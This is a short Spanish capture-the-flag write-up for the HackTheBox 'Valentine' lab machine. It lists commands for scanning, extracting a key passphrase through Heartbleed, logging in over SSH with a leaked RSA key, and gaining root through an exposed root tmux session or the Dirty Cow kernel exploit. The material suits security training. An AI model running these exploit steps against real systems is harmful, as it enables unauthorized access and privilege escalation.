HackTheBox Easy Linux Heartbleed OpenSSL CVE-2014-0160 tmux Dirty Cow

Valentine

Heartbleed extrae la frase de la clave RSA de memoria; SSH como hype; escalada via sesion tmux de root.

cat4clysm
Herramientas utilizadas
nmap sslscan wfuzz heartbleed.py john

Scanning

root@kali:~$
nmap -sC -sV -p80,443,22 -n -Pn 10.10.10.79 -oN targeted
nmap scan

Enumeracion Web

root@kali:~$
wfuzz -c --hc 403,404 -t 100 -w /usr/share/dirb/wordlists/common.txt http://10.10.10.79/FUZZ
wfuzz

Encontramos /dev/notes.txt y /dev/hype_key (clave RSA en hex).

notes hype key

Heartbleed - Extraccion de Memoria

root@kali:~$
sslscan 10.10.10.79
sslscan
root@kali:~$
nmap --script "vuln and safe" -p 443 10.10.10.79
heartbleed vuln
root@kali:~$
python heartbleed.py 10.10.10.79 -n 150
heartbleed data 
echo 'aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==' | base64 -d
# heartbleedbelievethehype

SSH con hype_key

root@kali:~$
cat hype_key | tr -d ' ' | xxd -ps -r > id_rsa
id_rsa
root@kali:~$
ssh -i id_rsa [email protected]
cat /home/hype/user.txt

Escalada - tmux session root

root@kali:~$
ps aux
ps aux tmux
root@kali:~$
tmux -S /.devs/dev_sess
cat /root/root.txt

Alternativa - Dirty Cow

root@kali:~$
searchsploit dirty cow
searchsploit -m linux/local/40839.c
mv 40839.c dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
./dirty
dirty cow

Lecciones aprendidas